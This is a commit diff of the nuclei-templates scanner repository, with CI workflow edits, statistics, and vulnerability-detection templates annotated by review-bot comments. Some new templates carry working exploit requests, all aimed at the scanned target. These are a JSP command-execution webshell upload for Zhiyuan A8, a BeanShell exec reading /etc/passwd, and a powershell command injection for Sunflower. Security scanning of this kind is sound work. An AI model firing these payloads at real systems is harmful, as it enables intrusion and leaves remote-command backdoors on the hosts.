Merge pull request #1 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2022-03-12 14:05:25 +05:30 committed by GitHub
commit 713c44a809
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
259 changed files with 4785 additions and 1988 deletions

View File

@ -10,23 +10,25 @@ jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/checkout@v2
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
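Review bot: the `Get Github tag` step has no failure handling: `jq -r .tag_name` prints the literal string `null` when the anonymous api.github.com call returns an error body (rate limiting is common from shared runners), so `steps.meta.outputs.tag != ''` stays true and `Setup CVE annotate` tries to wget a release URL that does not exist. Use `jq -r '.tag_name // empty'` so the guard actually trips. Separately, `sudo unzip cve-annotate.zip -d /usr/local/bin` unpacks an unverified download into the PATH; compare the archive against a pinned checksum before unzipping, and pin `actions/checkout` and `actions/setup-go` to a commit SHA rather than the moving `v2` tags.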
@ -44,4 +46,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: ${{ github.ref }}
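Review bot: the only change in this hunk is the trailing `branch:` line (a newline fix), but since it touches the push step: `ad-m/github-push-action@master` tracks a mutable branch and is handed `secrets.GITHUB_TOKEN` with write access to the repository; pin it to a release tag or commit SHA.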

View File

@ -6,25 +6,17 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v2
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
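Review bot: replacing the `actions/github-script` lookup with `curl | jq` trades an authenticated API call (`github.rest.repos.getLatestRelease` ran with the workflow token) for an anonymous one, and switches from `release.data.name` to `.tag_name`, which is the right field for the download URL but has the same `null`-on-error weakness as in the annotate workflow; use `.tag_name // empty` so `if: steps.meta.outputs.tag != ''` is meaningful. `${VERSION:1}` also silently assumes the tag starts with `v`, and `sudo unzip nuclei*.zip -d /usr/local/bin` installs whatever the glob matches without any checksum check.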

View File

@ -1,14 +1,21 @@
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cves/2017/CVE-2017-18598.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/snipeit-panel.yaml
cves/2017/CVE-2017-9833.yaml
cves/2020/CVE-2020-13158.yaml
cves/2020/CVE-2020-15050.yaml
cves/2020/CVE-2020-7943.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
cves/2022/CVE-2022-24990.yaml
default-logins/apollo/apollo-default-login.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
dns/caa-fingerprint.yaml
exposed-panels/kentico-login.yaml
exposed-panels/laravel-filemanager.yaml
exposed-panels/matomo-login-portal.yaml
exposed-panels/puppetboard-panel.yaml
exposed-panels/xweb500-panel.yaml
technologies/puppetdb-detect.yaml
technologies/puppetserver-detect.yaml
vulnerabilities/other/dixell-xweb500-filewrite.yaml
vulnerabilities/other/laravel-filemanager-lfi.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml

View File

@ -13,3 +13,6 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- cves/2020/CVE-2020-35489.yaml
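Review bot: `cves/2020/CVE-2020-35489.yaml` is added to the ignore list with no reason recorded; the header above explains what the list does but not why this entry is in it. A comment beside the entry (why it is excluded from default runs and under what condition it can return) keeps the list reviewable.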

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
**221 directories, 3173 files**.
**222 directories, 3221 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |

View File

@ -3,9 +3,17 @@ id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
tags: rce,cnvd,catfishcms,cnvd2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
requests:
- method: GET
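Review bot: the new `description` and `remediation` contradict each other: `CatfishCMS 4.8.54 contains a remote command execution vulnerability` names 4.8.54 as the affected version, while `Upgrade to CatfishCMS version 4.8.54 or later` names it as the fix. One of the two version numbers is wrong; check the references and state the last vulnerable and the first fixed release explicitly. The severity change from medium to critical is consistent with the added CVSS 10.0 vector, so that part looks fine.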
@ -25,3 +33,5 @@ requests:
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Write (RCE)
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and
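Review bot: this template writes a JSP file (`test123456.jsp`, containing a command-execution page) to the target and never removes it, so every scan leaves a persistent remote-command endpoint behind on a vulnerable host; that is a much heavier footprint than detection needs. As written the second step also cannot succeed: the uploaded page only runs a command when `pwd` equals `x`, but the GET sends `pwd=asasd3344`, so `contains(body_2, "Windows IP")` is dead logic (and would be Windows-only anyway). Prefer confirming the weakness from the first response (`htmoffice operate`) without planting executable content, drop the second request, and add the missing `description` field.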

View File

@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"
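Review bot: the `description` is a pasted vendor notice (`Currently, the security patch for this vulnerability has been released. Please take protective measures ...`) rather than a description of the flaw; trim it to what the vulnerability is (unauthenticated access to the BeanShell servlet allowing command execution) and move the patch statement into a `remediation` field. The request also runs `cat /etc/passwd` on the target and matches on a body regex alone; add a `type: status` matcher under `matchers-condition: and`, as the other new templates in this PR do, to cut false positives.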

View File

@ -2,10 +2,18 @@ id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
remediation: Pan Wei has released an update to resolve this vulnerability.
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
tags: pan,micro,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
requests:
- raw:
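Review bot: `The Pan Wei Micro E-office version running allows arbitrary file uploads` is ungrammatical and names no affected version, and `Pan Wei has released an update to resolve this vulnerability` gives no version to upgrade to; both fields should carry the concrete version range from the references. The `name` says `Pan Micro` while the description says `Pan Wei Micro`; make them agree. `http://v10.e-office.cn` is a vendor home page rather than an advisory, so it adds little as a reference.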
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and
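Review bot: the `cnvd2020` tag does not match the id `CNVD-2022-03672`; it should be `cnvd2022`. The reference list also mixes in `CNVD-2022-10270`, a different CNVD entry, without saying how it relates. The `cid` extractor regex `"verify_string":"(.*)"` is greedy and will over-capture if any field follows `verify_string` in the JSON response; `"verify_string":"([^"]*)"` is safer. A `description` field is missing.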

View File

@ -35,5 +35,3 @@ requests:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

View File

@ -1,10 +1,16 @@
id: axis2-default-login
id: CVE-2010-0219
info:
name: Axis2 Default Login
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
tags: axis,apache,default-login,axis2
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
tags: cve,cve2010,axis,apache,default-login,axis2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
requests:
- raw:
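Review bot: renaming the template id from `axis2-default-login` to `CVE-2010-0219` is a breaking change for anyone selecting templates by id; record the old id in the PR description or commit message so downstream filters can be updated. The added `classification` block carries only `cve-id`; the other CVE templates in this PR also include `cvss-metrics`, `cvss-score` and `cwe-id`, which would be useful here too.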
@ -39,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02

View File

@ -1,16 +1,17 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1540
requests:
- method: GET
path:
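Review bot: `reference: |` turns the two bullet lines beneath it into a single literal block scalar rather than a YAML list, so the template's `reference` value becomes the text `- https://www.exploit-db.com/exploits/11625` followed by the second line, instead of two URLs; drop the `|` (the sibling templates in this PR use a plain list). Also the `name` says `Component com_blog` while the description says `MyBlog (com_myblog)`; make them agree.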
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

View File

@ -1,16 +1,17 @@
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1601
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
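Review bot: this hunk drops one line from the `info` block of CVE-2010-1602 (`-5,7 +5,6`); if the removed line is `remediation: Upgrade to a supported version.`, that runs against the neighbouring hunks in the same PR where the identical line is present in the updated CVE-2010-1540, CVE-2010-1601 and CVE-2010-1658 templates. Since the rendered diff shows no +/- markers, state in the commit message which field was removed and why, and apply one convention across the Joomla LFI templates (a concrete fixed version would be better than either choice).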
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

View File

@ -5,10 +5,9 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1657
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

View File

@ -1,16 +1,17 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1658
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

View File

@ -1,16 +1,17 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1659
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

View File

@ -4,7 +4,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
@ -23,4 +22,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

View File

@ -1,16 +1,17 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1715
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/10

View File

@ -1,16 +1,17 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1717
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

View File

@ -1,16 +1,17 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1718
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

View File

@ -1,16 +1,17 @@
id: CVE-2010-1719
info:
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12233
- https://www.cvedetails.com/cve/CVE-2010-1719
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1719
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

View File

@ -1,16 +1,17 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1722
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

View File

@ -1,16 +1,17 @@
id: CVE-2010-1723
info:
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1723
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

View File

@ -31,5 +31,3 @@ requests:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25

View File

@ -1,11 +1,16 @@
id: CVE-2015-7297
info:
name: Joomla Core SQL Injection
author: princechaddha
severity: high
description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
tags: cve,cve2015,joomla,sqli
classification:
cve-id: CVE-2015-7297
requests:
- method: GET
@ -17,3 +22,5 @@ requests:
words:
- "cf79ae6addba60ad018347359bd144d2"
part: body
# Enhanced by mp on 2022/03/02

View File

@ -24,4 +24,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -5,8 +5,11 @@ info:
author: dhiyaneshDk
severity: medium
tags: cve,cve2017,xss,telerik
description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
